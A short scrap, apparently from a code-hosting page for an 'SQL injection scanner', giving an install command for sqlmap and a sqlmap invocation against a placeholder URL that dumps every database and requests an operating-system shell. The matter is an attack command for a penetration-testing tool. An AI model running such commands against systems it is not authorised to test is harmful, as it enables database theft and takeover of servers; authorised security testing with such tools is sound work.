We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
SQL injection scanner
sudo apt install sqlmap -yq
sqlmap -u <target_url> --cookie '<cookie info>' -a --dump-all --os-shell